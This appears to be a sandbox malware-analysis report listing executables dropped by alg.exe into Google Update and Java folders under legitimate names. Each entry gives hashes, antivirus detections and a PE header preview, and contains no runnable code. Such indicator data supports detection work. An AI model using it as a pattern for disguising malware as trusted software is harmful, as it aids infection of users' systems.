                                                                                                                                                                                                                                                                                                                                                    MD5:0E853AF5373CA10E55D6C3FC0F7B53BB
                                                                                                                                                                                                                                                                                                                                                    SHA1:335FFE1E8CDBF17CB635159A7D8F3AA197E5A091
                                                                                                                                                                                                                                                                                                                                                    SHA-256:2626236F6C570D956ABDEA91A50743991190F3F3D0C458902D78B66D225545BB
                                                                                                                                                                                                                                                                                                                                                    SHA-512:A1C7D6878BD036AC470F0D145724816F6D87E2917ED1657C36A6D12A4CC3643FAACBBB7BDAA4F77BEE1436870585A123BD1E76027CAF84DBDB78ED27DEC42DF8
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@..................................!......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.162018650281261
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:SO7cCNWB+09ZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:PjNWBP7sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:6D0125C239A931DBE5A1F37C4257332A
                                                                                                                                                                                                                                                                                                                                                    SHA1:F2F1926CAC636DCC446E556F582F9637365B8E54
                                                                                                                                                                                                                                                                                                                                                    SHA-256:821E87D128C6DF4B9C225A26A2C0736F9D37EE30FAC1A69E22A9C3C3979052D3
                                                                                                                                                                                                                                                                                                                                                    SHA-512:FAFEA2D3F29F41EE5EC7BE9FCD125B0C24F1345ADA9C58F7EEB0565E5FDD163CDEF04C0912609C0A65C3D9399253E9564ACB8597F1A8983D53FAB892D97BC2DD
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@..........................................................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1302528
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.238925859112943
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:sihRyhdsRrVsqjnhMgeiCl7G0nehbGZpbD:sihsoRJDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:6FDF2A7A7FADA114254365FC157E5B4D
                                                                                                                                                                                                                                                                                                                                                    SHA1:9DB31D220576932D66C6C80D5185EF658DB84631
                                                                                                                                                                                                                                                                                                                                                    SHA-256:C033162498FFD5EDB5D31BA488AC191A72C6B43BB5E782EC131A3A6CB9D54DDF
                                                                                                                                                                                                                                                                                                                                                    SHA-512:697F11BA538AB63CEA521479C826F91D22F356060B26AAD1CE8598EF649356A6862D019611C6D0DE27250D211D8091DA867EDA7E886E408060C49ADDACB6422D
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p......P..... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1342464
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.351010103752525
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:c1FDmRF+wpx/Qaf+sqjnhMgeiCl7G0nehbGZpbD:6mRF+wn/JfSDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:370D58FB5581A619E9DAFEF0C7F01FB9
                                                                                                                                                                                                                                                                                                                                                    SHA1:EDE9825B937819A33577101183E1671366070709
                                                                                                                                                                                                                                                                                                                                                    SHA-256:62193342C3A7F1929F7B97A24A8FA7265FE5FE53E86E6374381EAD48CCA249DD
                                                                                                                                                                                                                                                                                                                                                    SHA-512:04505CD7A2FAA785145AA79DBE438A496E15008BCAE71B62C0D5586AE3CB22A580F2FC777BFB063DE564FBB70CB37C46991B1D792BAE6E343C9EACD6F8EA5326
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@.................................................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.161982612835274
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:B2Ae621B+0YfXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:IE21BPIsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:662FD073A762F15C78D41D64D16AB4B1
                                                                                                                                                                                                                                                                                                                                                    SHA1:BC8E01E1E37CF3425727C59AC7CEE04721AB018E
                                                                                                                                                                                                                                                                                                                                                    SHA-256:760B4948721795FCAFEC4132E691D022B2B682D0397EC27FC3A5E19E7F3A6ECC
                                                                                                                                                                                                                                                                                                                                                    SHA-512:DF438EF155156EE3F84AFF0B7D4289F0FDA8BEFF07B6AB967BB03AAD9224609EF599804C13A19F2A015CBB62E242AAAA8D373E2EED6AF452F13B4042C13F64DF
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@..........................................................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4877824
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997099329500399
                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:98304:nvHFftsBuLnimh3Q/85ICWcV/2ZNGQM3D527BWG:5GBg/3QU5tPmGVQBWG
                                                                                                                                                                                                                                                                                                                                                    MD5:FC4D807E58AB0BE08C25F7440E254B4A
                                                                                                                                                                                                                                                                                                                                                    SHA1:B0F3105195F07A4E9727167346CD464A79A73BC2
                                                                                                                                                                                                                                                                                                                                                    SHA-256:CAC90E922AC5FC97A065E0E9B2583AAA6B05E0D7651EC78FDB5576C5B4EAF5A7
                                                                                                                                                                                                                                                                                                                                                    SHA-512:1E17E054CD44F751770C5460B6741DCE6C7CC2378B1709DEE85178763F1DCBE972ED8D6985760529B0FA3BFBF3DFC28867CDA262CF4E2F78B325D6FEE51D88E1
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......4...VA................@..............................J.......J... ..................................................X..P.......04A.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc...04A......6A..X..............@..@.reloc........A.......A.............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4877824
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997099237921247
                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:98304:AvHFftsBuLnimh3Q/85ICWcV/2ZNGQM3D527BWG:MGBg/3QU5tPmGVQBWG
                                                                                                                                                                                                                                                                                                                                                    MD5:743ECDBCA43FF37B2B6C8C28BFA28D43
                                                                                                                                                                                                                                                                                                                                                    SHA1:97456B61E46A1BE0C14FF156DC4D72B782CA5335
                                                                                                                                                                                                                                                                                                                                                    SHA-256:F0471372FA9D93D651CA2A78FEA4ED34A748F82AAD0EBBEA9D48BD6BFC7D1E77
                                                                                                                                                                                                                                                                                                                                                    SHA-512:766AC1F95F89757C40BD3D9643B4A82042AA4CE420155F3B897F2E88ABF4640EE0F81BE7FD115947A645F098DEF39A5BAEB0E91C3F0A1765B30B50D258ACE71F
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......4...VA................@..............................J.....d.J... ..................................................X..P.......04A.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc...04A......6A..X..............@..@.reloc........A.......A.............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1158144
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.068079038263284
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:QsXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:QssqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:3EC7D44C051B4CD6A52FB3D3F06BB801
                                                                                                                                                                                                                                                                                                                                                    SHA1:05487808F4F047E323333198EC25A91EEA870507
                                                                                                                                                                                                                                                                                                                                                    SHA-256:50350AA9001ABBEA55A2C15A21DDBBEA7E13F663568BA16DC6627F2B19903F60
                                                                                                                                                                                                                                                                                                                                                    SHA-512:A5AE0EE0FDC374B4F6C8B5FACC5F830CE1364191D5DAF7DC8C07CA70898522CE32ED3B46191341AC4DEDCEF1027F9DAC56A29EB6D7CDE682F52BB071D32BE7E2
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@..................................I......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0324110643820195
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:sKLXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:5LsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:F6C48526D6E2D2BFA2B5B445608AD598
                                                                                                                                                                                                                                                                                                                                                    SHA1:8A9E62C04A9F767D32810291A9D76505B2758E94
                                                                                                                                                                                                                                                                                                                                                    SHA-256:9348B47A63894CF86E73C3E3A25CA04FA4BFB5A8F57ED2A8F84387809342023E
                                                                                                                                                                                                                                                                                                                                                    SHA-512:947014A63C49E8279FA45CD4D55B25E17A1EF09BFC24A3D563A5F9C3C042655AEAF21D954FE691E054386E4F4041F608B99601BD99257D0B9C984BED7EF3C5CD
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................3........................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.446065022744214
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:FnEbH0j4x7R6SvyCMmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:FkwOtO7msqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:AFDC2E150FA33130F7DAFD054A540DA2
                                                                                                                                                                                                                                                                                                                                                    SHA1:6E01FFB8C7D31DD530BD7386097DA90C1F291514
                                                                                                                                                                                                                                                                                                                                                    SHA-256:BE4A2B90F614983F75810B4523A212B75E112720D1130BA144222C40190F5DC0
                                                                                                                                                                                                                                                                                                                                                    SHA-512:BC11042C5AF46D8E7041CCB4975C538B7B95D61408392B25CB592AAF6DAF9DAD5E2B24739CB0D1DC9BA741CD84B15176B79CEF5C3841F41D6B41DA7EBECFA846
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@.......'.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1212416
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.119728892638051
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:mv1vvXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:a13sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:C7089C5121A258DE5A0AEF2C0C7B302D
                                                                                                                                                                                                                                                                                                                                                    SHA1:B0F28207A1E9DF4975AA3E5962F08CA4B5AF855A
                                                                                                                                                                                                                                                                                                                                                    SHA-256:7584DF2EC895FE38942E10A109A38E2EA8AB45B36B445408AB6FE699788303FF
                                                                                                                                                                                                                                                                                                                                                    SHA-512:BB1FA7B3925B30F6EBDD1DD77543B1EF8A898A030F69CEFC473A7B2CEB669FCB2418B553710040EE87F7FBAFF027BF63C7F4CC8747124527361DFDCA622C7276
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.........................................................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.446821276862672
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:XnU/h/4KJsqjnhMgeiCl7G0nehbGZpbD:XU/VNDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:34A3059545405E6FB6D64A13C0EAE071
                                                                                                                                                                                                                                                                                                                                                    SHA1:6871CCB0D3A58F1F7302443BB03ED8DBDFB8A0EE
                                                                                                                                                                                                                                                                                                                                                    SHA-256:C107F576BEEF32B06E3FA79E5F0C82C2BB1D590D7F2369214DB8AB6249CC0191
                                                                                                                                                                                                                                                                                                                                                    SHA-512:EDEFBC16AD9CA90B036E614E85F486A7028B0E41544BFB9EBB918714F2980406431675E2DFC9D321D944B59FBA8AB5415F0FF77E1FFE0E29925E8D6AA2CD1752
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@...............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.483745361873165
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:9x71iBLZ05jNTmJWExKsqjnhMgeiCl7G0nehbGZpbD:9xhiHIjNgeDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:653B1CEEFC07016A2EEB64D39248AE9D
                                                                                                                                                                                                                                                                                                                                                    SHA1:54FD3ECA1261CFFC439477AE8FBC001759600504
                                                                                                                                                                                                                                                                                                                                                    SHA-256:5CFCE916C2743D77486A7F6ADDF1F4F9FDC256CD5D2AA40957616F199A04068E
                                                                                                                                                                                                                                                                                                                                                    SHA-512:DAEB6409519AF4BA6A5DFEFAB2714963320F30813C4C607D27D6A42891F4D6B961D69CF904C53B522F122098A85C358CCD6785A0359096DC24FDDFBCD1C9E3F7
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032881362005089
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:Q3rbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:83sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:6D6344BF4A704627737C4ED4D2E85FBB
                                                                                                                                                                                                                                                                                                                                                    SHA1:635B25D2ABD20B3ADFBD359E7BDCA8CC7A4E644F
                                                                                                                                                                                                                                                                                                                                                    SHA-256:9F49719A03E54B41699580155A2F727488E587896B2F0BA5B731C1157583D1F1
                                                                                                                                                                                                                                                                                                                                                    SHA-512:FF8A46F9DA9F79306CC1D3627A112381200B50AFB9A740796AFA64296953132CE914084970C44946BBCCCFCC28B38C45E20CC84B2180CDAF500964AB226F7047
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
